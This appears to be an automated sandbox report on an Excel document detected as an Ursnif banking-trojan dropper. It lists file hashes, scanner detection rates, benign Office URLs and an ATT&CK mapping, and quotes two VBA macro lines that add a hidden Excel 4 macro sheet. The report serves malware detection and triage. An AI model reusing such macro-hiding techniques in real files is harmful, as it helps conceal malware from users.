Loading ...

Play interactive tourEdit tour

Windows Analysis Report 650912 .xls

Overview

General Information

Sample Name:650912 .xls
Analysis ID:500395
MD5:5b239ac2b45218ad505553d52203c744
SHA1:abefd9905f25fdcea76783cfd877c19206d117ab
SHA256:f3ff9603b23796a30d10ae2cfa0001212752705a3e602371ae74d0f4d8defb71
Tags:brtGoziisfbursnifxls
Infos:

Most interesting Screenshot:

Detection

Ursnif Dropper
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Detected Italy targeted Ursnif dropper document
Document contains an embedded VBA macro with suspicious strings
Document contains embedded VBA macros

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6892 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: 650912 .xlsVirustotal: Detection: 16%Perma Link
Source: 650912 .xlsReversingLabs: Detection: 20%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://api.aadrm.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://api.aadrm.com/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://api.cortana.ai
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://api.office.net
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://api.onedrive.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://augloop.office.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://cdn.entity.
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://clients.config.office.net/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://config.edge.skype.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://cortana.ai
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://cortana.ai/api
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://cr.office.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://dev.cortana.ai
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://devnull.onenote.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://directory.services.
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://enrichment.osi.office.net/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://graph.windows.net
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://graph.windows.net/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://lifecycle.office.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://login.windows.local
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://management.azure.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://management.azure.com/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://messaging.office.com/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://ncus.contentsync.
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://officeapps.live.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://onedrive.live.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://osi.office.net
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://outlook.office.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://outlook.office.com/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://outlook.office365.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://outlook.office365.com/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://roaming.edog.
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://settings.outlook.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://staging.cortana.ai
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://tasks.office.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://wus2.contentsync.
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 35F6661B-AEDB-44E3-949D-A83F70583589.0.drString found in binary or memory: https://www.odwebp.svc.ms

E-Banking Fraud:

barindex
Detected Italy targeted Ursnif dropper documentShow sources
Source: Initial sampleOLE, VBA macro line: Ursnif specific tokens

System Summary:

barindex
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: 650912 .xlsOLE, VBA macro line: Excel4MacroSheets.Add(Before:=Worksheets((1))).Name = vgiom: ottoB
Source: 650912 .xlsOLE, VBA macro line: ActiveSheet.Visible = 0
Source: 650912 .xlsOLE indicator, VBA macros: true
Source: 650912 .xlsVirustotal: Detection: 16%
Source: 650912 .xlsReversingLabs: Detection: 20%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{3CBE1F6D-1C0C-41BC-94A2-8986A6629CA2} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: 650912 .xlsOLE indicator, Workbook stream: true
Source: classification engineClassification label: mal60.bank.expl.winXLS@1/1@0/0
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: 650912 .xlsInitial sample: OLE summary comments = ''BRT
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionPath InterceptionMasquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting11LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
650912 .xls17%VirustotalBrowse
650912 .xls20%ReversingLabsDocument-Excel.Trojan.Heuristic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://roaming.edog.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
